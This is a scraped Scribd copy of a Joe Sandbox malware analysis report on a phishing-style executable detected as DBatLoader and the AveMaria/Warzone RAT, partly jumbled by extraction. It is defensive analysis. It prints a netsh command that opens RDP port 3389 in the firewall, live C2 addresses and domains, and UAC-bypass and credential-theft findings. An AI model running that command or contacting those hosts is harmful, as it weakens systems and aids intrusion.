0% found this document useful (0 votes)

18 views

Report c9ee1d6a90be7524b01814f48b39b232 Compressed

Uploaded by

nhgbao1201

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

18 views

Report c9ee1d6a90be7524b01814f48b39b232 Compressed

Uploaded by

nhgbao1201

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 74

ID: 672956

Sample Name: Scan_IMG-

Purchase Order.exe
Cookbook: default.jbs
Time: 15:49:39
Date: 25/07/2022
Version: 35.0.0 Citrine
Table of Contents

Table of Contents 2
Windows Analysis Report Scan_IMG-Purchase Order.exe 4
Overview 4
General Information 4
Detection 4
Signatures 4
Classification 4
Process Tree 4
Malware Configuration 4
Yara Signatures 4
Initial Sample 4
Dropped Files 5
Memory Dumps 5
Unpacked PEs 5
Sigma Signatures 5
Snort Signatures 5
Joe Sandbox Signatures 6
AV Detection 6
Exploits 7
Compliance 7
Networking 7
E-Banking Fraud 7
System Summary 7
Data Obfuscation 7
Hooking and other Techniques for Hiding and Protection 7
HIPS / PFW / Operating System Protection Evasion 7
Lowering of HIPS / PFW / Operating System Security Settings 7
Stealing of Sensitive Information 7
Remote Access Functionality 7
Mitre Att&ck Matrix 7
Behavior Graph 8
Screenshots 9
Thumbnails 9
Antivirus, Machine Learning and Genetic Malware Detection 10
Initial Sample 10
Dropped Files 10
Unpacked PE Files 10
Domains 13
URLs 13
Domains and IPs 14
Contacted Domains 14
Contacted URLs 14
URLs from Memory and Binaries 14
World Map of Contacted IPs 14
Public IPs 14
Private 15
General Information 15
Warnings 15
Simulations 16
Behavior and APIs 16
Joe Sandbox View / Context 16
IPs 16
Domains 16
ASNs 16
JA3 Fingerprints 16
Dropped Files 16
Created / dropped Files 16
C:\Program Files\Microsoft DN1\rdpwrap.ini 16
C:\Program Files\Microsoft DN1\sqlmap.dll 17
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_159.exe_abfdf579450b8d0fec7425a8b3fe66ef4772d_b614c5c2_0e3516c1\Report.wer
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3F9.tmp.dmp 1717
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDED.tmp.WERInternalMetadata.xml 18
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF139.tmp.xml 18
C:\Users\Public\Libraries\Cdex.bat 18
C:\Users\Public\Libraries\Null 18
C:\Users\Public\Libraries\Scxozm.exe 19
C:\Users\Public\Libraries\Scxozm.exe:Zone.Identifier 19
C:\Users\Public\Libraries\ScxozmO.bat 19
C:\Users\Public\Libraries\Scxozmt.bat 20
C:\Users\Public\Libraries\mzoxcS.url 20
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Scxozmyplhmqutylctxlkglsugzstqx[1] 20
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Scxozmyplhmqutylctxlkglsugzstqx[1] 21
C:\Users\user\AppData\Local\Temp\159.exe 21
C:\Users\user\AppData\Roaming\.JmyHai.tmp 21
C:\Users\user\AppData\Roaming\JJrxrvA.tmp 22
\Device\ConDrv 22
Copyright Joe Security LLC 2022 Page 2 of 74
Static File Info 22
General 22
File Icon 23
Static PE Info 23
General 23
Entrypoint Preview 23
Data Directories 23
Sections 24
Resources 24
Imports 25
Possible Origin 26
Network Behavior 27
Snort IDS Alerts 27
Network Port Distribution 27
TCP Packets 27
UDP Packets 29
DNS Queries 29
DNS Answers 29
HTTP Request Dependency Graph 30
HTTPS Proxied Packets 30
Statistics 46
Behavior 46
System Behavior 46
Analysis Process: Scan_IMG-Purchase Order.exePID: 1476, Parent PID: 3396 46
General 46
File Activities 52
Registry Activities 52
Key Value Created 52
Analysis Process: cmd.exePID: 792, Parent PID: 1476 52
General 52
File Activities 53
File Read 53
Analysis Process: conhost.exePID: 5528, Parent PID: 792 53
General 53
Analysis Process: cmd.exePID: 5784, Parent PID: 792 53
General 53
File Activities 53
Analysis Process: conhost.exePID: 5472, Parent PID: 5784 54
General 54
Analysis Process: Scan_IMG-Purchase Order.exePID: 3364, Parent PID: 1476 54
General 54
File Activities 55
File Created 55
File Deleted 56
File Written 56
File Read 58
Registry Activities 58
Key Created 58
Key Value Created 59
Key Value Modified 59
Analysis Process: Scxozm.exePID: 5768, Parent PID: 3616 59
General 59
File Activities 63
File Created 63
File Written 64
File Read 65
Analysis Process: 159.exePID: 5528, Parent PID: 3364 65
General 65
Analysis Process: netsh.exePID: 4672, Parent PID: 5528 65
General 65
File Activities 66
File Written 66
Analysis Process: conhost.exePID: 6132, Parent PID: 4672 66
General 66
Analysis Process: Scxozm.exePID: 1384, Parent PID: 3616 66
General 66
File Activities 70
File Created 70
File Written 71
File Read 71
Analysis Process: rdpvideominiport.sysPID: 4, Parent PID: -1 71
General 71
Analysis Process: WerFault.exePID: 3708, Parent PID: 5528 72
General 72
Analysis Process: rdpdr.sysPID: 4, Parent PID: -1 72
General 72
Analysis Process: tsusbhub.sysPID: 4, Parent PID: -1 72
General 72
Analysis Process: Scxozm.exePID: 3676, Parent PID: 5768 73
General 73
Analysis Process: Scxozm.exePID: 3108, Parent PID: 1384 73
General 74
Disassembly 74

Copyright Joe Security LLC 2022 Page 3 of 74

Windows Analysis Report
Scan_IMG-Purchase Order.exe

Overview

General Information Detection Signatures Classiﬁcation

Sample Scan_IMG-Purchase
Name: Order.exe Multi AV Scanner detection for subm…

Analysis ID: 672956 Malicious sample detected (through…

MD5: c9ee1d6a90be75… Yara detected DBatLoader
SHA1:
Ransomware

12c080569f9bf82…
Yara detected UACMe UAC Bypass… Miner Spreading

SHA256: 6da3064773edf0…
Yara detected AveMaria stealer
malicious
malicious

malicious

Tags:
Evader Phishing

exe suspicious
suspicious

suspicious

Multi AV Scanner detection for dom… clean

clean

Infos:
clean

Antivirus detection for dropped file Exploiter Banker

Multi AV Scanner detection for drop…

AveMaria, DBatLoader, Spyware Trojan / Bot

UACMe Detected unpacking (creates a PE f…

Adware

Score: 100
Snort IDS alert for network traffic
Range: 0 - 100

Whitelisted: false Yara detected UAC Bypass using C…

Confidence: 100% Initial sample is a PE file and has a…

Uses netsh to modify the Windows …

Increases the number of concurrent…

Process Tree Hides user accounts

Injects a PE file into a foreign proce…

System is w10x64
Hides thatOrder.exe"
Scan_IMG-Purchase Order.exe (PID: 1476 cmdline: "C:\Users\user\Desktop\Scan_IMG-Purchase the sampleMD5:
has been dow…
C9EE1D6A90BE7524B01814F48B39B232)
cmd.exe (PID: 792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\Scxozmt.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
Modifies the windows firewall
conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 4672 cmdline: netsh advfirewall firewall add rule name="3389" dir=in
Tries action=allow
to harvest protocol=TCP
and steal localport=3389 MD5:
browser in…
A0AA3322BB46BBFC36AB9DC1DBBBB807)
Uses -ForceV1
conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff 32bit PE files
MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
WerFault.exe (PID: 3708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 356 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
Queries the volume information (nam…
cmd.exe (PID: 5784 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\Libraries\ScxozmO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffffYara
-ForceV1 MD5:match
signature EA777DEEA782E8B4D7C7C33BBF8A4496)
Scan_IMG-Purchase Order.exe (PID: 3364 cmdline: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe MD5: C9EE1D6A90BE7524B01814F48B39B232)
159.exe (PID: 5528 cmdline: "C:\Users\user\AppData\Local\Temp\159.exe" MD5:Antivirus or Machine Learning detec…
CA96229390A0E6A53E8F2125F2C01114)
Scxozm.exe (PID: 5768 cmdline: "C:\Users\Public\Libraries\Scxozm.exe" MD5: C9EE1D6A90BE7524B01814F48B39B232)
One or more processes crash
Scxozm.exe (PID: 3676 cmdline: C:\Users\Public\Libraries\Scxozm.exe MD5: C9EE1D6A90BE7524B01814F48B39B232)
Scxozm.exe (PID: 1384 cmdline: "C:\Users\Public\Libraries\Scxozm.exe" MD5: C9EE1D6A90BE7524B01814F48B39B232)
May sleep (evasive loops) to hinder…
Scxozm.exe (PID: 3108 cmdline: C:\Users\Public\Libraries\Scxozm.exe MD5: C9EE1D6A90BE7524B01814F48B39B232)
Uses code obfuscation techniques (…
rdpvideominiport.sys (PID: 4 cmdline: MD5: 0600DF60EF88FD10663EC84709E5E245)
rdpdr.sys (PID: 4 cmdline: MD5: 52A6CC99F5934CFAE88353C47B6193E7) Internet Provider seen in connection…
tsusbhub.sys (PID: 4 cmdline: MD5: 3A84A09CBC42148A0C7D00B3E82517F1)
cleanup Sample execution stops while proce…

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in co…

Found dropped PE file which has no…

Malware Conﬁguration
IP address seen in connection with …

⊘ No configs have been found

Enables debug privileges

Modifies existing windows services

Sample file is different than original …

PE file contains strange resources

Yara Signatures
Drops PE files

Initial Sample Tries to load missing DLLs

Copyright Joe Security LLC 2022 Page 4 of 74

Source Rule Description Author Strings

Scan_IMG-Purchase Order.exe JoeSecurity_DBat Yara detected Joe Security

Loader DBatLoader

Dropped Files
Source Rule Description Author Strings

C:\Users\Public\Libraries\ScxozmO.bat JoeSecurity_UAC Yara detected Joe Security

BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

C:\Users\Public\Libraries\mzoxcS.url Methodology_Shor Detects possible @itsreallynick 0x56:$hotkey: \x0AHotKey=1

tcut_HotKey shortcut usage for (Nick Carr) 0x0:$url_explicit: [InternetShortcut]
.URL persistence

C:\Users\Public\Libraries\mzoxcS.url Methodology_Cont Detects possible @itsreallynick 0x14:$file: URL=

ains_Shortcut_Oth shortcut usage for (Nick Carr) 0x0:$url_explicit: [InternetShortcut]
erURIhandlers .URL persistence

C:\Users\Public\Libraries\Scxozm.exe JoeSecurity_DBat Yara detected Joe Security

Loader DBatLoader

Memory Dumps
Source Rule Description Author Strings

00000016.00000002.422414404.0000000004E07000.00000 JoeSecurity_UAC Yara detected Joe Security

004.00001000.00020000.00000000.sdmp BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

00000012.00000003.354789031.0000000004D7C000.00000 JoeSecurity_UAC Yara detected Joe Security

004.00001000.00020000.00000000.sdmp BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

00000000.00000003.296980990.0000000004D20000.00000 JoeSecurity_UAC Yara detected Joe Security

004.00001000.00020000.00000000.sdmp BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

00000016.00000003.394075935.0000000004CE0000.00000 JoeSecurity_UAC Yara detected Joe Security

004.00001000.00020000.00000000.sdmp BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

00000000.00000003.268671897.0000000004D20000.00000 JoeSecurity_UAC Yara detected Joe Security

004.00001000.00020000.00000000.sdmp BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

Click to see the 690 entries

Unpacked PEs
Source Rule Description Author Strings

18.3.Scxozm.exe.4eb9a00.181.raw.unpack JoeSecurity_UAC Yara detected Joe Security

BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

0.3.Scan_IMG-Purchase Order.exe.4d77b04.209.raw.unpack JoeSecurity_UAC Yara detected Joe Security

BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

18.3.Scxozm.exe.2a9186c.46.unpack JoeSecurity_UAC Yara detected Joe Security

BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

22.3.Scxozm.exe.4d46800.209.raw.unpack JoeSecurity_UAC Yara detected Joe Security

BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

18.3.Scxozm.exe.4d7fb78.133.unpack JoeSecurity_UAC Yara detected Joe Security

BypassusingComp UAC Bypass using
uterDefaults ComputerDefaults

Click to see the 1336 entries

Sigma Signatures
⊘ No Sigma rule has matched

Snort Signatures
ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) - Source IP: 185.222.57.173 - Destination IP: 192.168.2.4

Copyright Joe Security LLC 2022 Page 5 of 74

Timestamp: 185.222.57.173192.168.2.44980497722851895 07/25/22-15:51:28.258544

SID: 2851895

Source Port: 4980

Destination Port: 49772

Protocol: TCP

Classtype: A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse - Source IP: 192.168.2.4 - Destination IP: 185.222.57.173

Timestamp: 192.168.2.4185.222.57.1734977249802851951 07/25/22-15:52:39.729742

SID: 2851951

Source Port: 49772

Destination Port: 4980

Protocol: TCP

Classtype: A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT PingResponse - Source IP: 192.168.2.4 - Destination IP: 185.222.57.173

Timestamp: 192.168.2.4185.222.57.1734977249802851946 07/25/22-15:53:08.297448

SID: 2851946

Source Port: 49772

Destination Port: 4980

Protocol: TCP

Classtype: A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT VNC GetModule - Source IP: 192.168.2.4 - Destination IP: 185.222.57.173

Timestamp: 192.168.2.4185.222.57.1734977249802851948 07/25/22-15:52:28.788965

SID: 2851948

Source Port: 49772

Destination Port: 4980

Protocol: TCP

Classtype: A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT PingCommand - Source IP: 185.222.57.173 - Destination IP: 192.168.2.4

Timestamp: 185.222.57.173192.168.2.44980497722851945 07/25/22-15:53:08.296970

SID: 2851945

Source Port: 4980

Destination Port: 49772

Protocol: TCP

Classtype: A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand - Source IP: 185.222.57.173 - Destination IP: 192.168.2.4

Timestamp: 185.222.57.173192.168.2.44980497722851933 07/25/22-15:52:28.734171

SID: 2851933

Source Port: 4980

Destination Port: 49772

Protocol: TCP

Classtype: A Network Trojan was detected

Joe Sandbox Signatures

AV Detection

Multi AV Scanner detection for submitted file

Yara detected AveMaria stealer

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Copyright Joe Security LLC 2022 Page 6 of 74

Exploits

Yara detected UACMe UAC Bypass tool

Yara detected UAC Bypass using ComputerDefaults

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Networking

Snort IDS alert for network traffic

E-Banking Fraud

Yara detected AveMaria stealer

System Summary

Malicious sample detected (through community Yara rule)

Initial sample is a PE file and has a suspicious name

Data Obfuscation

Yara detected DBatLoader

Detected unpacking (creates a PE file in dynamic memory)

Hooking and other Techniques for Hiding and Protection

Hides user accounts

Hides that the sample has been downloaded from the Internet (zone.identifier)

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Increases the number of concurrent connection per server for Internet Explorer

Modifies the windows firewall

Stealing of Sensitive Information

Yara detected AveMaria stealer

Tries to harvest and steal browser information (history, passwords, etc)

Remote Access Functionality

Yara detected AveMaria stealer

Mitre Att&ck Matrix

Copyright Joe Security LLC 2022 Page 7 of 74

Command Remote
Initial Privilege Defense Credential Lateral Network
Execution Persistence Discovery Collection Exfiltration and Service Impact
Access Escalation Evasion Access Movement Effects
Control Effects

Valid 1 1 1 2 1 2 Remote 1 Exfiltration 1 Eavesdrop Remotely 1

Accounts Scripting LSASS LSASS Disable or OS File and Services Data from Over Other Ingress on Insecure Track Endpoint
Driver Driver Modify Credential Directory Local Network Tool Network Device Denial of
Tools Dumping Discovery System Medium Transfer Communic Without Service
ation Authorizati
on

Default Scheduled 1 1 1 LSASS 1 4 Remote Data from Exfiltration 1 Exploit SS7 Remotely Device
Accounts Task/Job DLL Side- DLL Side- Scripting Memory System Desktop Removable Over Encrypted to Redirect Wipe Data Lockout
Loading Loading Information Protocol Media Bluetooth Channel Phone Without
Discovery Calls/SMS Authorizati
on

Domain At (Linux) 2 2 1 1 Security 1 SMB/Wind Data from Automated 1 Exploit SS7 Obtain Delete
Accounts Windows Windows Obfuscated Account Query ows Admin Network Exfiltration Non- to Track Device Device
Service Service Files or Manager Registry Shares Shared Standard Device Cloud Data
Information Drive Port Location Backups

Local At 1 1 1 1 1 1 1 NTDS 1 1 Distributed Input Scheduled 2 SIM Card Carrier

Accounts (Windows) Registry Process Software Security Component Capture Transfer Non- Swap Billing
Run Keys / Injection Packing Software Object Application Fraud
Startup Discovery Model Layer
Folder Protocol

Cloud Cron Network 1 1 LSA 2 SSH Keylogging Data 3 Manipulate Manipulate

Accounts Logon Registry DLL Side- Secrets Virtualizatio Transfer Application Device App Store
Script Run Keys / Loading n/Sandbox Size Limits Layer Communic Rankings
Startup Evasion Protocol ation or Ratings
Folder

Replication Launchd Rc.commo Rc.commo 3 Cached 1 VNC GUI Input Exfiltration Multiband Jamming or Abuse
Through n n Masqueradi Domain Remote Capture Over C2 Communic Denial of Accessibilit
Removable ng Credentials System Channel ation Service y Features
Media Discovery

External Scheduled Startup Startup 2 DCSync Network Windows Web Portal Exfiltration Commonly Rogue Wi- Data
Remote Task Items Items Virtualizatio Sniffing Remote Capture Over Used Port Fi Access Encrypted
Services n/Sandbox Manageme Alternative Points for Impact
Evasion nt Protocol

Drive-by Command Scheduled Scheduled 1 1 1 Proc Network Shared Credential Exfiltration Application Downgrade Generate
Compromis and Task/Job Task/Job Process Filesystem Service Webroot API Over Layer to Insecure Fraudulent
e Scripting Injection Scanning Hooking Symmetric Protocol Protocols Advertising
Interpreter Encrypted Revenue
Non-C2
Protocol

Exploit PowerShell At (Linux) At (Linux) 1 /etc/passw System Software Data Exfiltration Web Rogue Data
Public- Hidden d and Network Deploymen Staged Over Protocols Cellular Destruction
Facing Files and /etc/shado Connection t Tools Asymmetric Base
Application Directories w s Encrypted Station
Discovery Non-C2
Protocol

Supply AppleScript At At 1 Network Process Taint Local Data Exfiltration File Data
Chain (Windows) (Windows) Hidden Sniffing Discovery Shared Staging Over Transfer Encrypted
Compromis Users Content Unencrypte Protocols for Impact
e d/Obfuscat
ed Non-C2
Protocol

Behavior Graph

Copyright Joe Security LLC 2022 Page 8 of 74

Behavior Graph
Hide Legend
ID: 672956

Sample:

Startdate:
Scan_IMG-Purchase Order.exe

25/07/2022
Legend:
Architecture: WINDOWS
Score: 100
Process
Snort IDS alert for
network traffic
Multi AV Scanner detection
for domain / URL
Malicious sample detected
(through community Yara 8 other signatures started started started
Signature
rule)

Created File
Scan_IMG-Purchase Order.exe Scxozm.exe Scxozm.exe

DNS/IP Info 3 other processes

1 21 13 13

Is Dropped
morientlines.com

103.11.189.121, 443, 49757, 49758 dropped dropped dropped Is Windows Process

VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG
Singapore

Number of created Registry Values

C:\Users\Public\Libraries\Scxozm.exe, PE32 C:\Users\Public\Libraries\ScxozmO.bat, ASCII C:\Users\...\Scxozm.exe:Zone.Identifier, ASCII started started started started

Number of created Files

Visual Basic
Detected unpacking (creates
Injects a PE file into Multi AV Scanner detection
a PE file in dynamic
a foreign processes for dropped file
memory)

Scan_IMG-Purchase Order.exe cmd.exe Scxozm.exe

DelphiScxozm.exe

8 12 1
Java

mosesmanservernew.hopto.org
.Net C# or VB.NET
127.0.0.1
185.222.57.173, 49772, 4980 unknown dropped dropped
ROOTLAYERNETNL
Netherlands
unknown
C, C++ or other language

C:\Users\user\AppData\Local\Temp\159.exe, PE32 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ started started started

Is malicious

Tries to harvest and Increases the number

Internet
Hides that the sample
steal browser information of concurrent connection
Hides user accounts has been downloaded
(history, passwords, per server for Internet
from the Internet (zone.identifier)
etc) Explorer

159.exe conhost.exe cmd.exe

239.255.255.250
unknown
Reserved

started started started

Uses netsh to modify

Antivirus detection Multi AV Scanner detection Modifies the windows
the Windows network
for dropped file for dropped file firewall
and firewall settings

netsh.exe WerFault.exe conhost.exe

192.168.2.1
started unknown
unknown

conhost.exe

Screenshots
Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Copyright Joe Security LLC 2022 Page 9 of 74

Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Source Detection Scanner Label Link

Scan_IMG-Purchase Order.exe 27% Virustotal Browse

Scan_IMG-Purchase Order.exe 38% ReversingLabs Win32.Trojan.Gene

ric

Dropped Files
Source Detection Scanner Label Link

C:\Users\user\AppData\Local\Temp\159.exe 100% Avira HEUR/AGEN.1228

776

C:\Program Files\Microsoft DN1\sqlmap.dll 100% Avira PUA/Remoteadmin

.AR

C:\Program Files\Microsoft DN1\sqlmap.dll 20% Metadefender Browse

C:\Program Files\Microsoft DN1\sqlmap.dll 45% ReversingLabs Win64.PUA.Prese

noker

C:\Users\Public\Libraries\Scxozm.exe 38% ReversingLabs Win32.Trojan.Gene

ric

C:\Users\user\AppData\Local\Temp\159.exe 31% Metadefender Browse

C:\Users\user\AppData\Local\Temp\159.exe 85% ReversingLabs Win32.Trojan.Tiggr

Unpacked PE Files

Copyright Joe Security LLC 2022 Page 10 of 74

Source Detection Scanner Label Link Download

17.2.Scan_IMG-Purchase Order.exe.7c0000.4.unpack 100% Avira TR/Redcap.ghjpt Download File

22.3.Scxozm.exe.4d7efd0.193.unpack 100% Avira TR/Patched.Ren Download File
.Gen

18.3.Scxozm.exe.4d7fb78.133.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4e47fec.331.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4e4a450.204.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4d7cd18.97.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2ab5ec0.36.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.4c3cd18.95.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4e86b1c.215.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.2a9186c.46.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.2aa12ac.13.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.2ab1f50.8.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.2a6d15c.13.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2aa9e9c.90.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

18.3.Scxozm.exe.4e82320.187.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.2ab1c44.50.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4e44e0c.334.unpack 100% Avira TR/Patched.Ren Download File

.Gen

17.3.Scan_IMG-Purchase Order.exe.bc0711.15.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.2a72d38.74.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.2ab548c.22.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

18.3.Scxozm.exe.4d4bfec.87.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.4d7efd0.195.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2a9e218.6.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4d7fa7c.129.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.2a7c008.60.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.4c3c008.91.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d6f128.150.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.4d394a0.145.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.4d4b8b0.198.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4d7fb78.131.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d76bbc.192.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.4c3e6e8.108.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2aa2f9c.37.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.4d74008.171.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d47bc4.153.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4e82320.186.unpack 100% Avira TR/Patched.Ren Download File

.Gen
Copyright Joe Security LLC 2022 Page 11 of 74
Source Detection Scanner Label Link Download

0.3.Scan_IMG-Purchase Order.exe.2aa6b80.64.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.4d76ee0.197.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.4d0bff8.192.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.4d38008.140.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d80008.302.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d7dfa8.276.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2ab4008.59.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.4d782d4.253.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2aa8024.77.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.4c40008.100.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4e7fff0.351.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.2a6d14c.9.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4e45678.345.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d7750c.203.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d77148.199.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2aa8008.72.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.4d74008.173.unpack 100% Avira TR/Patched.Ren Download File

.Gen

35.0.Scxozm.exe.660000.5.unpack 100% Avira TR/Crypt.Morphi Download File

ne.Gen

18.3.Scxozm.exe.4e7d2d0.157.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.2abe498.19.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.2ab88f8.41.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

18.3.Scxozm.exe.2a7eed8.84.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.2ab2420.62.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.2ab92b4.6.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.4d79a00.183.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.4d3ef80.173.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2aaaa80.102.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.2ab2d38.76.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d541e8.309.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d4f3c8.279.unpack 100% Avira TR/Patched.Ren Download File

.Gen

17.0.Scan_IMG-Purchase Order.exe.660000.5.unpack 100% Avira TR/Crypt.Morphi Download File

ne.Gen

18.3.Scxozm.exe.2a7e498.19.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.2aa2afc.31.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.4c3e29c.104.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2abaa00.81.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

Copyright Joe Security LLC 2022 Page 12 of 74

Source Detection Scanner Label Link Download

22.3.Scxozm.exe.2ab403c.86.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

34.0.Scxozm.exe.660000.7.unpack 100% Avira TR/Crypt.Morphi Download File

ne.Gen

22.3.Scxozm.exe.2ab210c.59.unpack 100% Avira TR/Patched.Ren Download File

.Gen

